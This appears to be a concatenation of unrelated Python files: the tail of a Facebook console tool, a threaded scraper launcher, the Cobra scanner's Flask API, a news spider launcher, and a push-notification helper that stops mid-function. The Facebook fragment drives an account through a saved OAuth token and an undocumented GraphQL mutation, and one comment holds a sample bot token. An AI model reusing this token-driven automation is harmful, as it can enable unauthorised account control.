\x1b[1;91m]') lain() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def guard(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Enable' print '║-> \x1b[1;37;40m2. Disable' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if g == '1': aktif = 'true' gaz(toket, aktif) else: if g == '2': non = 'false' gaz(toket, non) else: if g == '0': lain() else: if g == '': keluar() else: keluar() def get_userid(toket): url = 'https://graph.facebook.com/me?access_token=%s' % toket res = requests.get(url) uid = json.loads(res.text) return uid['id'] def gaz(toket, enable=True): id = get_userid(toket) data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id)) headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket} url = 'https://graph.facebook.com/graphql' res = requests.post(url, data=data, headers=headers) print res.text if '"is_shielded":true' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: if '"is_shielded":false' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: print '\x1b[1;91m[!] Error' keluar() if __name__ == '__main__': login()
multi_start.py
# -*- coding: utf-8 -*- """ # @Time : 2019/7/4 18:27 # @Author : 王诚坤 # @File : multi_start.py # @des : 多线程启动函数 """ from multi_haodf import getContent import threading from tools import ConnectDatabase as conn def main(): # 查询数据库连接 select_conn = conn.MySQLCommand() select_conn.connectMysql(table="all_url") # 确定线程数量 num = int(input("Threading Number:\t")) print("Current Number:\t %d" % num) # 获取启动函数 start = getContent.start # 查询 title_list = ["qa_number", "qa_url"] situation = "WHERE qa_status = '0' or qa_status ='3'" select_cursor = select_conn.select_order(title_list=title_list, situation=situation) # 定义一个tag控制循环 tag = True while tag: th_list = [] for i in range(num): temp_result = select_cursor.fetchmany(10) if temp_result[0] is None: tag = False break th = threading.Thread(target=start, args=(temp_result,)) th.start() th_list.append(th) # 使主线程等待所有子线程执行完成 for t in th_list: t.join() # 关闭数据库连接 select_conn.closeMysql() if __name__ == '__main__': main()
api.py
# -*- coding: utf-8 -*- """ api ~~~ Implements API Server and Interface :author: Feei <feei@feei.cn> :homepage: https://github.com/WhaleShark-Team/cobra :license: MIT, see LICENSE for more details. :copyright: Copyright (c) 2018 Feei. All rights reserved """ import datetime import errno import json import multiprocessing import os import re import socket import subprocess import threading import time import traceback import requests from flask import Flask, request, render_template, Blueprint from flask_restful import Api, Resource, reqparse from werkzeug.urls import url_unquote from . import cli from .cli import get_sid from .config import Config, running_path, package_path from .engine import Running from .log import logger from .utils import allowed_file, secure_filename, PY2, split_branch try: # Python 3 import queue from urllib.parse import urlparse, quote_plus except ImportError: # Python 2 import Queue as queue from urlparse import urlparse from urllib import quote_plus q = queue.Queue() app = Flask(__name__, static_folder='templates/asset') running_host = '0.0.0.0' running_port = 5000 def producer(task): q.put(task) def consumer(): while True: task = q.get() p = multiprocessing.Process(target=cli.start, args=task) p.start() p.join() q.task_done() class AddJob(Resource): @staticmethod def post(): data = request.json if not data or data == "": return {"code": 1003, "msg": "Only support json, please post json data."} target = data.get("target") formatter = data.get("formatter") output = data.get("output") rule = data.get("rule") is_del = data.get("dels") is_valid_key = key_verify(data=data) if is_valid_key is not True: return is_valid_key if not target or target == "": return {"code": 1002, "msg": "URL cannot be empty."} if not formatter or formatter == '': formatter = 'json' if not output or output == '': output = '' if not rule or rule == '': rule = '' if not is_del or is_del == '': is_del = False # Report All Id a_sid = get_sid(target, True) running = Running(a_sid) # Write a_sid running data running.init_list(data=target) # Write a_sid running status data = { 'status': 'running', 'report': '' } running.status(data) if isinstance(target, list): for t in target: # Scan if re.match(r'http://|https://', t): arg = (t, formatter, output, rule, a_sid, is_del) producer(task=arg) else: return {"code": 1004, "msg": "Please input a valid URL"} result = { 'msg': 'Add scan job successfully.', 'sid': a_sid, 'total_target_num': len(target), } else: if re.match(r'http://|https://', target): arg = (target, formatter, output, rule, a_sid, is_del) producer(task=arg) else: return {"code": 1004, "msg": "Please input a valid URL"} result = { 'msg': 'Add scan job successfully.', 'sid': a_sid, 'total_target_num': 1, } return {"code": 1001, "result": result} class JobStatus(Resource): @staticmethod def post(): data = request.json if not data or data == "": return {"code": 1003, "msg": "Only support json, please post json data."} sid = data.get("sid") is_valid_key = key_verify(data=data) if is_valid_key is not True: return is_valid_key if not sid or sid == "": return {"code": 1002, "msg": "sid is required."} sid = str(data.get("sid")) # 需要拼接入路径,转为字符串 running = Running(sid) if running.is_file() is not True: data = { 'code': 1004, 'msg': 'scan id does not exist!', 'sid': sid, 'status': 'no such scan', 'report': '' } return data else: result = running.status() r_data = running.list() allow_deploy = True total_vul_number = critical_vul_number = high_vul_number = medium_vul_number = low_vul_number = 0 if result['status'] == 'running': ret = True result['still_running'] = dict() for s_sid, git in r_data['sids'].items(): if Running(s_sid).is_file(True) is False: result['still_running'].update({s_sid: git}) ret = False if ret: result['status'] = 'done' running.status(result) elif result['status'] == 'done': # 统计各类漏洞数量,并给出上线风险评估 targets = list() scan_list = Running(sid).list() for s_sid, target_str in scan_list.get('sids').items(): target_info = dict() # 分割项目地址与分支,默认 master target, branch = split_branch(target_str) target_info.update({ 'sid': s_sid, 'target': target, 'branch': branch, }) s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid)) with open(s_sid_file, 'r') as f: s_sid_data = json.load(f) if s_sid_data.get('code') != 1001: continue else: s_sid_data = s_sid_data.get('result') total_vul_number += len(s_sid_data.get('vulnerabilities')) target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))}) target_info.update(s_sid_data) targets.append(target_info) for vul in s_sid_data.get('vulnerabilities'): if 9 <= int(vul.get('level')) <= 10: critical_vul_number += 1 elif 6 <= int(vul.get('level')) <= 8: high_vul_number += 1 elif 3 <= int(vul.get('level')) <= 5: medium_vul_number += 1 elif 1 <= int(vul.get('level')) <= 2: low_vul_number += 1 if critical_vul_number > 0: allow_deploy = False data = { 'msg': 'success', 'sid': sid, 'status': result.get('status'), 'report': request.url_root + result.get('report'), 'still_running': result.get('still_running'), 'total_target_num': r_data.get('total_target_num'), 'statistic': { 'critical': critical_vul_number, 'high': high_vul_number, 'medium': medium_vul_number, 'low': low_vul_number }, 'allow_deploy': allow_deploy, 'not_finished': int(r_data.get('total_target_num')) - len(r_data.get('sids')) + len(result.get('still_running')), } return {"code": 1001, "result": data} class FileUpload(Resource): @staticmethod def post(): """ Scan by uploading compressed files :return: """ if 'file' not in request.files: return {'code': 1002, 'result': "File can't empty!"} file_instance = request.files['file'] if file_instance.filename == '': return {'code': 1002, 'result': "File name can't empty!"} if file_instance and allowed_file(file_instance.filename): filename = secure_filename(file_instance.filename) dst_directory = os.path.join(package_path, filename) file_instance.save(dst_directory) # Start scan a_sid = get_sid(dst_directory, True) data = { 'status': 'running', 'report': '' } Running(a_sid).status(data) try: cli.start(dst_directory, None, 'stream', None, a_sid=a_sid) except Exception as e: traceback.print_exc() code, result = 1001, {'sid': a_sid} return {'code': code, 'result': result} else: return {'code': 1002, 'result': "This extension can't support!"} class ResultData(Resource): @staticmethod def post(): """ pull scan result data. :return: """ data = request.json if not data or data == "": return {"code": 1003, "msg": "Only support json, please post json data."} s_sid = data.get('sid') if not s_sid or s_sid == "": return {"code": 1002, "msg": "sid is required."} s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid)) if not os.path.exists(s_sid_file): return {'code': 1002, 'msg': 'No such target.'} with open(s_sid_file, 'r') as f: scan_data = json.load(f) if scan_data.get('code') == 1001: scan_data = scan_data.get('result') else: return { 'code': scan_data.get('code'), 'msg': scan_data.get('msg'), } rule_filter = dict() for vul in scan_data.get('vulnerabilities'): rule_filter[vul.get('id')] = vul.get('rule_name') return { 'code': 1001, 'result': { 'scan_data': scan_data, 'rule_filter': rule_filter, } } class ResultDetail(Resource): @staticmethod def post(): """ get vulnerable file content :return: """ data = request.json if not data or data == "": return {'code': 1003, 'msg': 'Only support json, please post json data.'} sid = data.get('sid') file_path = url_unquote(data.get('file_path')) if not sid or sid == '': return {"code": 1002, "msg": "sid is required."} if not file_path or file_path == '': return {'code': 1002, 'msg': 'file_path is required.'} s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=sid)) if not os.path.exists(s_sid_file): return {'code': 1002, 'msg': 'No such target.'} with open(s_sid_file, 'r') as f: target_directory = json.load(f).get('result').get('target_directory') if not target_directory or target_directory == '': return {'code': 1002, 'msg': 'No such directory'} if PY2: file_path = map(secure_filename, [path.decode('utf-8') for path in file_path.split('/')]) else: file_path = map(secure_filename, [path for path in file_path.split('/')]) filename = target_directory for _dir in file_path: filename = os.path.join(filename, _dir) if os.path.exists(filename): extension = guess_type(filename) if is_text(filename): with open(filename, 'r') as f: file_content = f.read() else: file_content = 'This is a binary file.' else: return {'code': 1002, 'msg': 'No such file.'} return {'code': 1001, 'result': {'file_content': file_content, 'extension': extension}} class Search(Resource): @staticmethod def post(): """ Search specific rule. :return: """ data = request.json if not data or data == "": return {'code': 1003, 'msg': 'Only support json, please post json data.'} sid = data.get('sid') if not sid or sid == '': return {'code': 1002, 'msg': 'sid is required.'} rule_id = data.get('rule_id') if not rule_id or rule_id == '': return {'code': 1002, 'msg': 'rule_id is required.'} scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=sid)) if not os.path.exists(scan_list_file): return {'code': 1002, 'msg': 'No such sid.'} with open(scan_list_file, 'r') as f: scan_list = json.load(f) if not isinstance(rule_id, list): rule_id = [rule_id] search_data = list() for s_sid in scan_list.get('sids').keys(): target, branch = split_branch(scan_list.get('sids').get(s_sid)) search_result = search_rule(s_sid, rule_id) cvi_count = list(search_result.values()) if int(cvi_count[0]) > 0: search_data.append({ 'target_info': { 'sid': s_sid, 'target': target, 'branch': branch, }, 'search_result': search_result, }) return { 'code': 1001, 'result': search_data, } class GetMemeber(Resource): parser = reqparse.RequestParser() parser.add_argument('repo-url', type=str, required=True, help='repo-url 不能为空,格式为 http://xxx.xxx.com/user/reponame.git') def get(self): """ 从 GitLab API 获取项目负责人 :return: """ data = self.parser.parse_args() repo_url = data.get('repo-url') url_parser = urlparse(repo_url) if 'gitlab' in url_parser.netloc: _, members = self.get_member(url_parser=url_parser) if _: if members: return { 'code': 1001, 'result': { 'members': members, }, } else: return { 'code': 1002, 'msg': 'Empty members', } else: return { 'code': 1002, 'msg': members } else: return { 'code': 1002, 'msg': 'Not support repo type' } @staticmethod def get_member(url_parser): """ 请求 GitLab API :param url_parser: urlparse(repo_url) :return: """ domain = url_parser.netloc scheme = url_parser.scheme repo = re.sub(r"\.git.*", "", url_parser.path) # 去掉 repo 开头的 / repo = repo[1:] if repo.startswith('/') else repo api_url = scheme + '://' + domain + '/api/v3/projects/' + quote_plus(repo) + '/members' try: private_token = Config(level1="git", level2="private_token").value if private_token == '': return False, 'No private token specified' header = { 'PRIVATE-TOKEN': private_token } data = requests.get(url=api_url, headers=header, timeout=3).json() members = [] for m in data: members.append(m.get('username')) return True, members except Exception as e: return False, str(e) @app.route('/report', methods=['GET']) def report(): """ get report :return: """ data_lists = [] total_files = 0 total_vul_number = critical_vul_number = high_vul_number = medium_vul_number = low_vul_number = 0 rule_num = dict() target_directorys = [] time_range = {} time_start = request.args.get(key='start') time_end = request.args.get(key='end') if time_start is None and time_end is None: time_start = datetime.datetime.today() + datetime.timedelta(days=-7) time_end = datetime.datetime.today().strftime("%Y-%m-%d") time_start = time_start.strftime("%Y-%m-%d") if time_start is not None and time_end is not None: if PY2: time_start = time_start.encode('utf-8') time_end = time_end.encode('utf-8') if time_start is not '' and time_end is not '': time_str = "%Y-%m-%d" date_time_str = "%m-%d" t_start = datetime.datetime.strptime(time_start, time_str) t_end = datetime.datetime.strptime(time_end, time_str) t_end += datetime.timedelta(days=1) t_start_tuple = t_start.timetuple() t_end_tuple = t_end.timetuple() t_start_un = time.mktime(t_start_tuple) t_end_un = time.mktime(t_end_tuple) while t_start < t_end: time_range[t_start.strftime(date_time_str)] = 0 t_start += datetime.timedelta(days=1) for data_file in os.listdir(running_path): if re.match(r'.*_data', data_file): data = os.path.join(running_path, data_file) data_time = os.path.getctime(filename=data) if t_start_un < data_time < t_end_un: data_time = time.strftime(date_time_str, time.localtime(data_time)) with open(data, 'r') as f: try: data_content = json.load(f) except json.JSONDecodeError: logger.warning('[REPORT] Delete empty data file: {}'.format(data_file)) os.remove(data) continue data_results = data_content.get('result') if data_results: target_directory = data_results.get('target_directory') if target_directory in target_directorys: continue else: target_directorys.append(target_directory) data_lists.append(data) total_files += data_results.get('file') total_vul_number += len(data_results.get('vulnerabilities')) time_range[data_time] += len(data_results.get('vulnerabilities')) for vul in data_results.get('vulnerabilities'): if 9 <= int(vul.get('level')) <= 10: critical_vul_number += 1 elif 6 <= int(vul.get('level')) <= 8: high_vul_number += 1 elif 3 <= int(vul.get('level')) <= 5: medium_vul_number += 1 elif 1 <= int(vul.get('level')) <= 2: low_vul_number += 1 try: rule_num[vul.get('rule_name')] += 1 except KeyError: rule_num[vul.get('rule_name')] = 1 else: logger.debug('[REPORT] Empty result in {0}'.format(data_file)) time_range = sorted_dict(time_range) return render_template(template_name_or_list='report_my.html', time_start=time_start, time_end=time_end, total=len(data_lists), total_files=total_files, critical_vul_number=critical_vul_number, high_vul_number=high_vul_number, medium_vul_number=medium_vul_number, low_vul_number=low_vul_number, total_vul_number=total_vul_number, rule_num=rule_num, time_range=time_range) class GetSSid(Resource): @staticmethod def post(): data = request.json sid = data.get('sid') scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=sid)) if not os.path.exists(scan_list_file): return {'code': 1002, 'msg': 'No such sid.'} with open(scan_list_file, 'r') as f: s_sid = json.load(f) key = None if 'sids' in s_sid and len(s_sid['sids'].keys()) != 0: key = s_sid['sids'].keys()[0] return {'code': 1001, 'result': {'s_sid': key}} @app.route('/', methods=['GET', 'POST']) def summary(): a_sid = request.args.get(key='sid') enable_web_ui = Config(level1="cobra", level2="enable_web_ui").value # so ugly !!!! if enable_web_ui is not '1': return render_template(template_name_or_list='disable.html') key = Config(level1="cobra", level2="secret_key").value if a_sid is None: return render_template(template_name_or_list='index.html', key=key) status_url = 'http://{host}:{port}/api/status'.format(host=running_host, port=running_port) post_data = { 'key': key, 'sid': a_sid, } headers = { "Content-Type": "application/json", } r = requests.post(url=status_url, headers=headers, data=json.dumps(post_data)) try: scan_status = json.loads(r.text) except ValueError as e: return render_template(template_name_or_list='error.html', msg='Check scan status failed: {0}'.format(e)) if scan_status.get('code') != 1001: return render_template(template_name_or_list='error.html', msg=scan_status.get('msg')) else: if scan_status.get('result').get('status') == 'running': still_running = scan_status.get('result').get('still_running') for s_sid, target_str in still_running.items(): target, branch = split_branch(target_str) still_running[s_sid] = {'target': target, 'branch': branch} else: still_running = dict() scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid)) scan_list = Running(a_sid).list() start_time = os.path.getctime(filename=scan_status_file) start_time = time.localtime(start_time) start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time) total_targets_number = scan_status.get('result').get('total_target_num') not_finished_number = scan_status.get('result').get('not_finished') total_vul_number, critical_vul_number, high_vul_number, medium_vul_number, low_vul_number = 0, 0, 0, 0, 0 rule_num = dict() rules = dict() targets = list() for s_sid, target_str in scan_list.get('sids').items(): if s_sid not in still_running: target_info = dict() # 分割项目地址与分支,默认 master target, branch = split_branch(target_str) target_info.update({ 'sid': s_sid, 'target': target, 'branch': branch, }) s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid)) with open(s_sid_file, 'r') as f: s_sid_data = json.load(f) if s_sid_data.get('code') != 1001: continue else: s_sid_data = s_sid_data.get('result') total_vul_number += len(s_sid_data.get('vulnerabilities')) target_info.update({'total_vul_number': len(s_sid_data.get('vulnerabilities'))}) target_info.update(s_sid_data) targets.append(target_info) for vul in s_sid_data.get('vulnerabilities'): if 9 <= int(vul.get('level')) <= 10: critical_vul_number += 1 elif 6 <= int(vul.get('level')) <= 8: high_vul_number += 1 elif 3 <= int(vul.get('level')) <= 5: medium_vul_number += 1 elif 1 <= int(vul.get('level')) <= 2: low_vul_number += 1 try: rule_num[vul.get('rule_name')] += 1 except KeyError: rule_num[vul.get('rule_name')] = 1 rules[vul.get('id')] = vul.get('rule_name') return render_template(template_name_or_list='summary.html', total_targets_number=total_targets_number, not_finished_number=not_finished_number, start_time=start_time, targets=targets, a_sid=a_sid, total_vul_number=total_vul_number, critical_vul_number=critical_vul_number, high_vul_number=high_vul_number, medium_vul_number=medium_vul_number, low_vul_number=low_vul_number, rule_num=rule_num, rules=rules, running=still_running, ) def key_verify(data): key = Config(level1="cobra", level2="secret_key").value _key = data.get("key") if _key == key: return True elif not _key or _key == "": return {"code": 1002, "msg": "Key cannot be empty."} elif not _key == key: return {"code": 4002, "msg": "Key verify failed."} else: return {"code": 4002, "msg": "Unknown key verify error."} def is_text(fn): msg = subprocess.Popen(['file', fn], stdout=subprocess.PIPE).communicate()[0] return 'text' in msg.decode('utf-8') def guess_type(fn): import mimetypes extension = mimetypes.guess_type(fn)[0] if extension: """text/x-python or text/x-java-source""" # extension = extension.split('/')[1] extension = extension.replace('-source', '') else: extension = fn.split('/')[-1].split('.')[-1] custom_ext = { 'html': 'htmlmixed', 'md': 'markdown', } if custom_ext.get(extension) is not None: extension = custom_ext.get(extension) return extension.lower() def search_rule(sid, rule_id): """ Search specific rule name in scan data. :param sid: scan data id :param rule_id: a list of rule name :return: {rule_name1: num1, rule_name2: num2} """ scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=sid)) search_result = dict.fromkeys(rule_id, 0) if not os.path.exists(scan_data_file): return search_result with open(scan_data_file, 'r') as f: scan_data = json.load(f) if scan_data.get('code') == 1001 and len(scan_data.get('result').get('vulnerabilities')) > 0: for vul in scan_data.get('result').get('vulnerabilities'): if vul.get('id') in rule_id: search_result[vul.get('id')] += 1 return search_result else: return search_result def sorted_dict(adict): adict = adict.items() return sorted(adict) def start(host, port, debug): logger.info('Start {host}:{port}'.format(host=host, port=port)) api = Blueprint("api", __name__) resource = Api(api) resource.add_resource(AddJob, '/api/add') resource.add_resource(JobStatus, '/api/status') resource.add_resource(GetSSid, '/api/get_ssid') resource.add_resource(FileUpload, '/api/upload') resource.add_resource(ResultData, '/api/list') resource.add_resource(ResultDetail, '/api/detail') resource.add_resource(Search, '/api/search') resource.add_resource(GetMemeber, '/api/members') app.register_blueprint(api) # consumer threads = [] for i in range(5): threads.append(threading.Thread(target=consumer, args=())) for i in threads: i.setDaemon(daemonic=True) i.start() try: global running_port, running_host running_host = host if host != '0.0.0.0' else '127.0.0.1' running_port = port app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1) except socket.error as v: if v.errno == errno.EACCES: logger.critical('[{err}] must root permission for start API Server!'.format(err=v.strerror)) exit() else: logger.critical('{msg}'.format(msg=v.strerror)) logger.info('API Server start success')
news.py
import time from .spider.coldspider import datablogspider, collegespider, govspider, gongyispider, mediaspider from .spider.hotspider import hotspider, spider, rankspider, photospider from .spider.db import write_to_sys, db_img, pic_to_sys import threading # 部署爬虫唯一出入口main()方法 if __name__ == '__main__': # 定义break条件,timeiout变量: timeout = 0 print('==============================================================\n') print('neteasenews Spider is working now, give me some patience,ok?\n') print('==============================================================\n') print('1.爬虫全部运作\n') print('2.热更新(只更新即时性新闻)\n') print('3.冷更新(只更新变动频率低的新闻)\n') print('4.下载txt(需要数据库中存储有适量数据)\n') print('==============================================================\n') choices = int(input('请输入你的选择:\n\t\t\t')) print('--------------------------------------------------------------\n') if choices: # 如何从中断的数据开始,而不是从零开始?Redis?序列化操作?值得思考 if choices == 1: print('All of the Spider Will Be Running, Take It Easy!!!') # 获取所有json文档信息和跳转内容 spider() # 获取排行榜内容 rankspider() # 获取数读,新闻学院,政务,公益,媒体导航标签里面的内容,开启多线程. task_datablog = threading.Thread(target=datablogspider) task_colleges = threading.Thread(target=collegespider) task_gov = threading.Thread(target=govspider) task_gongyi = threading.Thread(target=gongyispider) task_media = threading.Thread(target=mediaspider) tasks = [task_datablog, task_colleges, task_gov, task_gongyi, task_media] for task in tasks: task.start() for task_ in tasks: task_.join() for task_run in tasks: if task_run.is_alive(): print('Task is running now') time.sleep(5) print('Spider will be off, wish no bugs or exceptions') print('大吉大利,今晚吃鸡') print('==============================================================\n') elif choices == 2: # 只更新首页推荐内容 hotspider() rankspider() # 理论上新闻更新速度根本没这么快,10S一篇新闻...666 print('please wait for 10s,it will run again!!') time.sleep(10) print('==============================================================\n') print('热更新完毕') print('大吉大利,今晚吃鸡') print('==============================================================\n') elif choices == 3: task_datablog = threading.Thread(target=datablogspider) task_colleges = threading.Thread(target=collegespider) task_gov = threading.Thread(target=govspider) task_gongyi = threading.Thread(target=gongyispider) task_media = threading.Thread(target=mediaspider) tasks = [task_datablog, task_colleges, task_gov, task_gongyi, task_media] for task in tasks: task.start() for task_ in tasks: task_.join() for task_run in tasks: if task_run.is_alive(): print('Task is running now') time.sleep(10) # 从网站获取pictures photospider() # 从数据库获取pictures db_img() time.sleep(5) print('==============================================================\n') print('冷更新完毕') print('大吉大利,今晚吃鸡') print('==============================================================\n') elif choices == 4: write_to_sys() pic_to_sys() print('==============================================================\n') print('下载完毕') print('大吉大利,今晚吃鸡') print('==============================================================\n') time.sleep(10) print('==============================================================\n') print('Spider will be off, wish no bugs or exceptions') print('\t\t\t大吉大利\t\t今晚吃鸡') print('==============================================================\n') # 展示部分数据
notify_mtr.py
#!/usr/bin/env python3 # _*_ coding:utf-8 _*_ import base64 import hashlib import hmac import os import re import threading import time import urllib.parse from json import JSONDecodeError import json5 as json import requests from utils_env import get_file_path # 原先的 print 函数和主线程的锁 _print = print mutex = threading.Lock() # 定义新的 print 函数 def print(text, *args, **kw): """ 使输出有序进行,不出现多线程同一时间输出导致错乱的问题。 """ with mutex: _print(text, *args, **kw) # 通知服务 # fmt: off push_config = { 'HITOKOTO': False, # 启用一言(随机句子) 'BARK_PUSH': '', # bark IP 或设备码,例:https://api.day.app/DxHcxxxxxRxxxxxxcm 'BARK_ARCHIVE': '', # bark 推送是否存档 'BARK_GROUP': '', # bark 推送分组 'BARK_SOUND': '', # bark 推送声音 'CONSOLE': True, # 控制台输出 'DD_BOT_SECRET': '', # 钉钉机器人的 DD_BOT_SECRET 'DD_BOT_TOKEN': '', # 钉钉机器人的 DD_BOT_TOKEN 'FSKEY': '', # 飞书机器人的 FSKEY 'GOBOT_URL': '', # go-cqhttp # 推送到个人QQ:http://127.0.0.1/send_private_msg # 群:http://127.0.0.1/send_group_msg 'GOBOT_QQ': '', # go-cqhttp 的推送群或用户 # GOBOT_URL 设置 /send_private_msg 时填入 user_id=个人QQ # /send_group_msg 时填入 group_id=QQ群 'GOBOT_TOKEN': '', # go-cqhttp 的 access_token 'IGOT_PUSH_KEY': '', # iGot 聚合推送的 IGOT_PUSH_KEY 'PUSH_KEY': '', # server 酱的 PUSH_KEY,兼容旧版与 Turbo 版 'PUSH_PLUS_TOKEN': '', # push+ 微信推送的用户令牌 'PUSH_PLUS_USER': '', # push+ 微信推送的群组编码 'QMSG_KEY': '', # qmsg 酱的 QMSG_KEY 'QMSG_TYPE': '', # qmsg 酱的 QMSG_TYPE 'QYWX_AM': '', # 企业微信应用 'QYWX_KEY': '', # 企业微信机器人 'TG_BOT_TOKEN': '', # tg 机器人的 TG_BOT_TOKEN,例:1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ 'TG_USER_ID': '', # tg 机器人的 TG_USER_ID,例:1434078534 'TG_API_HOST': '', # tg 代理 api 'TG_PROXY_AUTH': '', # tg 代理认证参数 'TG_PROXY_HOST': '', # tg 机器人的 TG_PROXY_HOST 'TG_PROXY_PORT': '', # tg 机器人的 TG_PROXY_PORT } notify_function = [] # fmt: on # 首先读取 面板变量 或者 github action 运行变量 for k in push_config: if v := os.getenv(k): push_config[k] = v # 读取配置文件中的变量 (会覆盖环境变量) CONFIG_PATH = os.getenv("NOTIFY_CONFIG_PATH") or get_file_path("notify.json5") if os.path.exists(CONFIG_PATH): print(f"通知配置文件存在:{CONFIG_PATH}。") try: for k, v in dict( json.load(open(CONFIG_PATH, mode="r", encoding="utf-8")) ).items(): if k in push_config: push_config[k] = v except ValueError: print( f"错误:配置文件 {CONFIG_PATH} 格式不对,请在 https://verytoolz.com/json5-validator.html 中检查格式" ) elif CONFIG_PATH: print(f"{CONFIG_PATH} 配置的通知文件不存在,请检查文件位置或删除对应环境变量!") def bark(title: str, content: str) -> None: """ 使用 bark 推送消息。 """ if not push_config.get("BARK_PUSH"): print("bark 服务的 BARK_PUSH 未设置!!\n取消推送") return print("bark 服务启动") if push_config.get("BARK_PUSH").startswith("http"): url = f'{push_config.get("BARK_PUSH").rstrip("/")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}' else: url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}' bark_params = { "BARK_ARCHIVE": "isArchive", "BARK_GROUP": "group", "BARK_SOUND": "sound", } params = "" for pair in filter( lambda pairs: pairs[0].startswith("BARK_") and pairs[0] != "BARK_PUSH" and pairs[1] and bark_params.get(pairs[0]), push_config.items(), ): params += f"{bark_params.get(pair[0])}={pair[1]}&" if params: url = url + "?" + params.rstrip("&") response = requests.get(url, timeout=15) datas = response.json() if datas.get("code") == 200: print("bark 推送成功!") elif datas.get("code") == 400: print("bark 推送失败!找不到 Key 对应的 DeviceToken。") else: print(f"bark 推送失败!响应数据:{response.text}") def console(title: str, content: str) -> None: """ 使用 控制台 推送消息。 """ print(f"{title}\n\n{content}") def dingding_bot(title: str, content: str) -> None: """ 使用 钉钉机器人 推送消息。 """ if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"): print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送") return print("钉钉机器人 服务启动") timestamp = str(round(time.time() * 1000)) secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8") string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET")) string_to_sign_enc = string_to_sign.encode("utf-8") hmac_code = hmac.new( secret_enc, string_to_sign_enc, digestmod=hashlib.sha256 ).digest() sign = urllib.parse.quote_plus(base64.b64encode(hmac_code)) url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}&timestamp={timestamp}&sign={sign}' headers = {"Content-Type": "application/json;charset=utf-8"} data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}} response = requests.post( url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15 ) datas = response.json() if datas.get("errcode") == 0: print("钉钉机器人 推送成功!") else: print(f"钉钉机器人 推送失败!响应数据:{response.text}") def feishu_bot(title: str, content: str) -> None: """ 使用 飞书机器人 推送消息。 """ if not push_config.get("FSKEY"): print("飞书 服务的 FSKEY 未设置!!\n取消推送") return print("飞书 服务启动") url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}' data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}} response = requests.post(url, data=json.dumps(data, quote_keys=True), timeout=15) datas = response.json if datas.get("StatusCode") == 0: print("飞书 推送成功!") else: print(f"飞书 推送失败!响应数据:{response.text}") def go_cqhttp(title: str, content: str) -> None: """ 使用 go_cqhttp 推送消息。 """ if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"): print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送") return print("go-cqhttp 服务启动") url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}' response = requests.get(url, timeout=15) datas = response.json() if datas.get("status") == "ok": print("go-cqhttp 推送成功!") else: print("go-cqhttp 推送失败!响应数据:{response.text}") def iGot(title: str, content: str) -> None: """ 使用 iGot 推送消息。 """ if not push_config.get("IGOT_PUSH_KEY"): print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送") return print("iGot 服务启动") url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}' data = {"title": title, "content": content} headers = {"Content-Type": "application/x-www-form-urlencoded"} response = requests.post(url, data=data, headers=headers, timeout=15) datas = response.json() if 